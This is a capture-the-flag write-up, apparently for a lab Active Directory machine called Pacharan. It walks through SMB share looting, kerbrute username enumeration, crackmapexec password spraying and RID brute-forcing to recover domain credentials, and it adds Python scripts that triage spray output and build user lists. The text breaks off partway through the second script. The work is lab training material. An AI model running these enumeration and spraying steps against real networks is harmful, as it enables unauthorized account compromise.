┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# fscan -h 192.168.69.69
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| ''__/ _ |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.69.69:445 open
192.168.69.69:88 open
192.168.69.69:139 open
192.168.69.69:135 open
[*] alive ports len is: 4
start vulscan
[*] NetBios 192.168.69.69 [+] DC:PACHARAN\WIN-VRU3GG3DPLJ
[*] NetInfo
[*]192.168.69.69
[->]WIN-VRU3GG3DPLJ
[->]192.168.69.69
Done 4/4
Scan finished, elapsed: 1.128075052s
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# nmap -sC -sV 192.168.69.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 14:51 CST
Nmap scan report for 192.168.69.69
Host is up (0.00014s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-04 13:51:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
MAC Address: 08:00:27:7A:01:8C (Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-VRU3GG3DPLJ; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6h59m57s
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:7a:01:8c (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-12-04T13:51:20
|_ start_date: 2024-12-04T13:48:49
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.06 seconds
The domain is PACHARAN.THL. Map it and the DC hostname WIN-VRU3GG3DPLJ to 192.168.69.69 in /etc/hosts before going further.
Also note the clock skew nmap reports (6h59m57s). Kerberos rejects authenticated requests whose timestamp is more than five minutes off the KDC, so anything that needs a ticket later has to run with the attacker's clock synced to the DC (ntpdate, or faketime around the tool). The kerbrute user enumeration below is not affected, because it only sends AS-REQs without pre-authentication and reads the error code.
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbmap -u anonymous -H 192.168.69.69
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.69.69:445 Name: PACHARAN.THL Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
NETLOGON NO ACCESS Recurso compartido del servidor de inicio de sesión
NETLOGON2 READ ONLY
PACHARAN NO ACCESS
PDF Pro Virtual Printer NO ACCESS Soy Hacker y arreglo impresoras
print$ NO ACCESS Controladores de impresora
SYSVOL NO ACCESS Recurso compartido del servidor de inicio de sesión
Users NO ACCESS
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbclient -U anonymous //192.168.69.69/NETLOGON2
Password for [WORKGROUP\anonymous]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 1 01:25:34 2024
.. D 0 Thu Aug 1 01:25:34 2024
Orujo.txt A 22 Thu Aug 1 01:25:55 2024
7735807 blocks of size 4096. 4713743 blocks available
smb: \> get Orujo.txt
getting file \Orujo.txt of size 22 as Orujo.txt (10.7 KiloBytes/sec) (average 10.7 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat Orujo.txt
Pericodelospalotes6969
Two useful strings come out of this: the file's contents, Pericodelospalotes6969, and the file's name, Orujo. Both are worth trying as usernames and as passwords.
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# kerbrute userenum -d PACHARAN.THL --dc 192.168.69.69 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 12/04/24 - Ronnie Flathers @ropnop
2024/12/04 15:01:42 > Using KDC(s):
2024/12/04 15:01:42 > 192.168.69.69:88
2024/12/04 15:01:42 > [+] VALID USERNAME: chivas@PACHARAN.THL
2024/12/04 15:01:44 > [+] VALID USERNAME: hendrick@PACHARAN.THL
2024/12/04 15:01:44 > [+] VALID USERNAME: whisky@PACHARAN.THL
2024/12/04 15:01:44 > [+] VALID USERNAME: gordons@PACHARAN.THL
2024/12/04 15:01:46 > [+] VALID USERNAME: redlabel@PACHARAN.THL
2024/12/04 15:01:47 > [+] VALID USERNAME: beefeater@PACHARAN.THL
2024/12/04 15:01:47 > [+] VALID USERNAME: Chivas@PACHARAN.THL
2024/12/04 15:01:49 > [+] VALID USERNAME: invitado@PACHARAN.THL
2024/12/04 15:02:06 > [+] VALID USERNAME: administrador@PACHARAN.THL
2024/12/04 15:06:35 > [+] VALID USERNAME: carlosv@PACHARAN.THL
2024/12/04 15:07:19 > [+] VALID USERNAME: Whisky@PACHARAN.THL
2024/12/04 15:07:26 > [+] VALID USERNAME: RedLabel@PACHARAN.THL
2024/12/04 15:07:41 > [+] VALID USERNAME: GordonS@PACHARAN.THL
2024/12/04 15:07:42 > [+] VALID USERNAME: GINEBRA@PACHARAN.THL
2024/12/04 15:07:48 > [+] VALID USERNAME: CarlosV@PACHARAN.THL
2024/12/04 15:07:49 > [+] VALID USERNAME: CHIVAS@PACHARAN.THL
2024/12/04 15:07:50 > [+] VALID USERNAME: Beefeater@PACHARAN.THL
2024/12/04 15:08:03 > Done! Tested 8295455 usernames (17 valid) in 380.478 seconds
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat kerbrute_users.txt|cut -d ' ' -f14|cut -d '@' -f1>valid_users.txt
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat valid_users.txt
chivas
hendrick
whisky
gordons
redlabel
beefeater
Chivas
invitado
administrador
carlosv
Whisky
RedLabel
GordonS
GINEBRA
CarlosV
CHIVAS
Beefeater
Append the two strings from NETLOGON2 (Pericodelospalotes6969 and Orujo) to valid_users.txt as well. The same file is then used as both the username and the password list, so every user:string combination gets tried, with --continue-on-success so crackmapexec does not stop at the first hit:
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# crackmapexec smb PACHARAN.THL -u valid_users.txt -p valid_users.txt --continue-on-success
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:chivas
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:hendrick
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:whisky
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:gordons
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:redlabel
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:beefeater
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:Chivas
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:invitado
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:administrador
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:carlosv
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:Whisky
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:RedLabel
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:GordonS
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:GINEBRA
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:CarlosV
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:CHIVAS
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:Beefeater
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:Pericodelospalotes6969
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Pericodelospalotes6969:Orujo
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:chivas STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:hendrick STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:whisky STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:gordons STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:redlabel STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:beefeater STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:Chivas STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:invitado STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:administrador STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:carlosv STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:Whisky STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:RedLabel STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:GordonS STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:GINEBRA STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:CarlosV STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:CHIVAS STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:Beefeater STATUS_LOGON_FAILURE
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Orujo:Pericodelospalotes6969
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:Orujo STATUS_LOGON_FAILURE
Read the output carefully. Pericodelospalotes6969 is reported as [+] with every single password, including nonsense like chivas; a real account cannot behave like that (a password check either matches or it does not), and the RID brute-force later in this writeup confirms no such user exists. Rows that succeed for everything have to be discarded when --continue-on-success is used. The one genuine hit is Orujo:Pericodelospalotes6969.
I tried evil-winrm against the first "user" anyway:
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# evil-winrm -i 192.168.69.69 -u Pericodelospalotes6969 -p Per
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
That fails. The remaining hit is Orujo:Pericodelospalotes6969, so try that over WinRM:
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# evil-winrm -i 192.168.69.69 -u Orujo -p Pericodelospalotes6969
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
That does not work either. The credentials are valid for SMB, so a WinRM 401 (WinRMAuthorizationError) almost always means the account is simply not in a group allowed to use WinRM (Remote Management Users or Administrators).
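Both WinRM failures, and the misleading wall of [+] lines for Pericodelospalotes6969, are easier to handle if the spray output is triaged mechanically rather than by eye. The script below is an added example, not part of the original writeup: it parses crackmapexec's per-attempt result lines, keeps usernames that contain spaces intact, and flags any user that "succeeded" with every password tried as accepting anything instead of reporting it as a credential; only the remaining [+] rows are real. The sample lines are constructed to match the format of the output above (the "Chivas Regal" row is there to exercise a name with a space).

```python
"""Triage crackmapexec SMB spray output: real credentials vs. accounts that
'succeed' with every password.  Added example, not code from the writeup."""
import re
import sys
from collections import defaultdict

# One result line per attempt, e.g.
#   SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Orujo:Pericodelospalotes6969
#   SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:chivas STATUS_LOGON_FAILURE
# The user part is matched lazily up to the first ':' so names with spaces survive;
# anything after the password (an NT status, or nothing) is optional.
RESULT_RE = re.compile(
    r"\[(?P<mark>[+-])\]\s+(?P<domain>[^\\\s]+)\\(?P<user>.+?):(?P<password>\S+)"
    r"(?:\s+(?P<status>STATUS_\w+))?"
)

# Constructed sample, trimmed from the spray output shown above (same columns).
CONSTRUCTED_SPRAY_LINES = [
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ)",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:chivas",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:Orujo",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Pericodelospalotes6969:Pericodelospalotes6969",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:chivas STATUS_LOGON_FAILURE",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:Orujo STATUS_LOGON_FAILURE",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Orujo:Pericodelospalotes6969",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1",
]


def parse_results(lines):
    """Yield (user, password, success, status) for each attempt line; banner lines are skipped."""
    for line in lines:
        m = RESULT_RE.search(line)
        if m:
            yield m.group("user"), m.group("password"), m.group("mark") == "+", m.group("status")


def triage(lines):
    """Split hits into genuine credentials and users that accepted every password.

    A user is only judged 'accepts anything' when it was tried more than once and
    every attempt came back [+]; a single [+] cannot be distinguished from a real hit.
    """
    attempts = defaultdict(int)
    successes = defaultdict(list)
    for user, password, ok, _status in parse_results(lines):
        attempts[user] += 1
        if ok:
            successes[user].append(password)
    accepts_anything = sorted(
        u for u in successes if attempts[u] > 1 and len(successes[u]) == attempts[u]
    )
    credentials = {u: pws for u, pws in successes.items() if u not in accepts_anything}
    return {"credentials": credentials, "accepts_anything": accepts_anything}


if __name__ == "__main__":
    # usage: python3 triage.py spray.txt   (no argument: run on the constructed sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
    else:
        lines = CONSTRUCTED_SPRAY_LINES
    result = triage(lines)
    for user in result["accepts_anything"]:
        print(f"[!] {user}: accepted every password tried, not a credential")
    for user, pws in result["credentials"].items():
        for pw in pws:
            print(f"[+] {user}:{pw}")
```

On the page's own output this reports Orujo:Pericodelospalotes6969 as the only credential and marks Pericodelospalotes6969 as accepting anything, which is exactly what the two WinRM attempts above established the slow way.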
So look at what Orujo can reach over SMB instead:
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbmap -u Orujo -p Pericodelospalotes6969 -H 192.168.69.69
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.69.69:445 Name: PACHARAN.THL Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
NETLOGON READ ONLY Recurso compartido del servidor de inicio de sesión
NETLOGON2 NO ACCESS
PACHARAN READ ONLY
PDF Pro Virtual Printer NO ACCESS Soy Hacker y arreglo impresoras
print$ NO ACCESS Controladores de impresora
SYSVOL NO ACCESS Recurso compartido del servidor de inicio de sesión
Users NO ACCESS
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbclient -U Orujo //192.168.69.69/PACHARAN
Password for [WORKGROUP\Orujo]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 1 01:21:13 2024
.. D 0 Thu Aug 1 01:21:13 2024
ah.txt A 921 Thu Aug 1 01:20:16 2024
7735807 blocks of size 4096. 4712894 blocks available
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat ah.txt
Mamasoystreamer1!
Mamasoystreamer2@
Mamasoystreamer3#
Mamasoystreamer4$
Mamasoystreamer5%
Mamasoystreamer6^
Mamasoystreamer7&
Mamasoystreamer8*
Mamasoystreamer9(
Mamasoystreamer10)
MamasoyStreamer11!
MamasoyStreamer12@
MamasoyStreamer13#
MamasoyStreamer14$
MamasoyStreamer15%
MamasoyStreamer16^
MamasoyStreamer17&
MamasoyStreamer18*
MamasoyStreamer19(
MamasoyStreamer20)
MamaSoyStreamer1!
MamaSoyStreamer2@
MamaSoyStreamer3#
MamaSoyStreamer4$
MamaSoyStreamer5%
MamaSoyStreamer6^
MamaSoyStreamer7&
MamaSoyStreamer8*
MamaSoyStreamer9(
MamaSoyStreamer10)
MamasoyStream1er!
MamasoyStream2er@
MamasoyStream3er#
MamasoyStream4er$
MamasoyStream5er%
MamasoyStream6er^
MamasoyStream7er&
MamasoyStream8er*
MamasoyStream9er(
MamasoyStream10er)
MamasoyStr1amer!
MamasoyStr2amer@
MamasoyStr3amer#
MamasoyStr4amer$
MamasoyStr5amer%
MamasoyStr6amer^
MamasoyStr7amer&
MamasoyStr8amer*
MamasoyStr9amer(
MamasoyStr10amer)
Mamasoystreamer1
This looks like a password list: mutations of one base word with a trailing number and symbol. Before spraying 51 candidates against every known user, check the domain lockout policy (crackmapexec's --pass-pol option prints it) so the spray stays below the lockout threshold. Spray it and keep only the successes:
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# crackmapexec smb PACHARAN.THL -u valid_users.txt -p ah.txt --continue-on-success |grep +
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\whisky:MamasoyStream2er@
SMB PACHARAN.THL 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Whisky:MamasoyStream2er@
That yields Whisky's password, MamasoyStream2er@ (whisky and Whisky are the same account; AD usernames are case-insensitive, which is also why kerbrute listed every case variant as "valid"). Try evil-winrm with it:
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# evil-winrm -i 192.168.69.69 -u 'Whisky' -p 'MamasoyStream2er@'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
Failed again, for the same reason as before. Check Whisky's SMB shares instead:
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# smbmap -u Whisky -p MamasoyStream2er@ -H 192.168.69.69
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[/] Auth[!] Unable to remove test file at \\192.168.69.69\PDF Pro Virtual Printer\LBJIFVWHAS.txt, please remove manually
[+] IP: 192.168.69.69:445 Name: PACHARAN.THL Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
NETLOGON READ ONLY Recurso compartido del servidor de inicio de sesión
NETLOGON2 NO ACCESS
PACHARAN NO ACCESS
PDF Pro Virtual Printer NO ACCESS Soy Hacker y arreglo impresoras
print$ NO ACCESS Controladores de impresora
SYSVOL NO ACCESS Recurso compartido del servidor de inicio de sesión
Users NO ACCESS
Nothing new here. Note the smbmap warning above: it tests write access by dropping a file on each share, and it could not delete LBJIFVWHAS.txt from the printer share again; on a real engagement that is an artifact to clean up.
Whisky's credentials are still useful for a RID brute-force, which resolves sequential RIDs under the domain SID and so enumerates every account, including ones kerbrute's wordlist would never have guessed:
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# crackmapexec smb PACHARAN.THL -u Whisky -p MamasoyStream2er@ --rid-brute >rid-brute.txt
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# wc -l rid-brute.txt
40 rid-brute.txt
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat rid-brute.txt |grep SidTypeUser |cut -d ' ' -f21|cut -d '\' -f2 >valid_users.txt
┌──(root㉿kali)-[/home/kali/thl/Pacharan]
└─# cat valid_users.txt
Administrador
Invitado
krbtgt
DefaultAccount
WIN-VRU3GG3DPLJ$
Orujo
Ginebra
Whisky
Hendrick
Chivas
Whisky2
JB
Chivas
beefeater
CarlosV
RedLabel
Gordons
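The two cut pipelines above (the one over the kerbrute output and this one over the RID-brute output) split on spaces, so a field number that happens to work for one line breaks when the columns are padded differently, and an account name containing a space is cut short. The Python script below is an added example, not part of the original writeup: it parses both output formats with regular expressions that take everything between the backslash and the "(SidType...)" marker, deduplicates case-insensitively (kerbrute's chivas/Chivas/CHIVAS are one account), and drops machine, krbtgt and DefaultAccount entries so the result is ready for a spray. The sample lines are constructed to mirror the output shown on this page; the RIDs in them are illustrative.

```python
"""Build a spray-ready user list from kerbrute userenum and crackmapexec --rid-brute
output.  Added example, not code from the writeup."""
import re
import sys

# kerbrute:  "2024/12/04 15:01:42 >  [+] VALID USERNAME:  chivas@PACHARAN.THL"
KERBRUTE_RE = re.compile(r"VALID USERNAME:\s+(?P<user>[^@\s]+)@(?P<realm>\S+)")
# crackmapexec --rid-brute:  "...  1108: PACHARAN\Chivas Regal (SidTypeUser)"
# The name is matched lazily up to the " (SidType...)" marker so spaces are kept.
RID_RE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<sidtype>SidType\w+)\)"
)

# Accounts that are never worth spraying.
SKIP_NAMES = {"krbtgt", "defaultaccount"}

# Constructed samples in the two tools' formats (subset of the page's output; RIDs illustrative).
CONSTRUCTED_KERBRUTE_LINES = [
    "2024/12/04 15:01:42 >  [+] VALID USERNAME:  chivas@PACHARAN.THL",
    "2024/12/04 15:01:44 >  [+] VALID USERNAME:  hendrick@PACHARAN.THL",
    "2024/12/04 15:01:47 >  [+] VALID USERNAME:  Chivas@PACHARAN.THL",
    "2024/12/04 15:01:49 >  [+] VALID USERNAME:  invitado@PACHARAN.THL",
    "2024/12/04 15:02:06 >  [+] VALID USERNAME:  administrador@PACHARAN.THL",
    "2024/12/04 15:07:42 >  [+] VALID USERNAME:  GINEBRA@PACHARAN.THL",
    "2024/12/04 15:07:49 >  [+] VALID USERNAME:  CHIVAS@PACHARAN.THL",
    "2024/12/04 15:08:03 >  Done! Tested 8295455 usernames (17 valid) in 380.478 seconds",
]
CONSTRUCTED_RID_LINES = [
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  500: PACHARAN\Administrador (SidTypeUser)",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  501: PACHARAN\Invitado (SidTypeUser)",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  502: PACHARAN\krbtgt (SidTypeUser)",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  503: PACHARAN\DefaultAccount (SidTypeUser)",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  512: PACHARAN\Admins. del dominio (SidTypeGroup)",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  1000: PACHARAN\WIN-VRU3GG3DPLJ$ (SidTypeUser)",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  1104: PACHARAN\Orujo (SidTypeUser)",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  1107: PACHARAN\Chivas (SidTypeUser)",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  1108: PACHARAN\Chivas Regal (SidTypeUser)",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  1109: PACHARAN\Whisky2 (SidTypeUser)",
    r"SMB  PACHARAN.THL  445  WIN-VRU3GG3DPLJ  1110: PACHARAN\JB (SidTypeUser)",
]


def parse_kerbrute(lines):
    """Usernames (without realm) from kerbrute userenum output, in the order reported."""
    return [m.group("user") for m in map(KERBRUTE_RE.search, lines) if m]


def parse_rid_brute(lines, want="SidTypeUser"):
    """(rid, name) pairs of the requested SID type from crackmapexec --rid-brute output."""
    found = []
    for line in lines:
        m = RID_RE.search(line)
        if m and m.group("sidtype") == want:
            found.append((int(m.group("rid")), m.group("name")))
    return found


def merge_users(*sources):
    """Case-insensitive union; the first spelling seen wins, machine and skip-list accounts dropped."""
    canonical = {}
    for names in sources:
        for name in names:
            key = name.lower()
            if name.endswith("$") or key in SKIP_NAMES:
                continue
            canonical.setdefault(key, name)
    return sorted(canonical.values(), key=str.lower)


def build_spray_list(kerbrute_lines=CONSTRUCTED_KERBRUTE_LINES, rid_lines=CONSTRUCTED_RID_LINES):
    """RID-brute names first so AD's own spelling is kept, then whatever kerbrute added."""
    rid_names = [name for _rid, name in parse_rid_brute(rid_lines)]
    return merge_users(rid_names, parse_kerbrute(kerbrute_lines))


if __name__ == "__main__":
    # usage: python3 users.py kerbrute.txt rid-brute.txt   (no arguments: constructed sample)
    if len(sys.argv) > 2:
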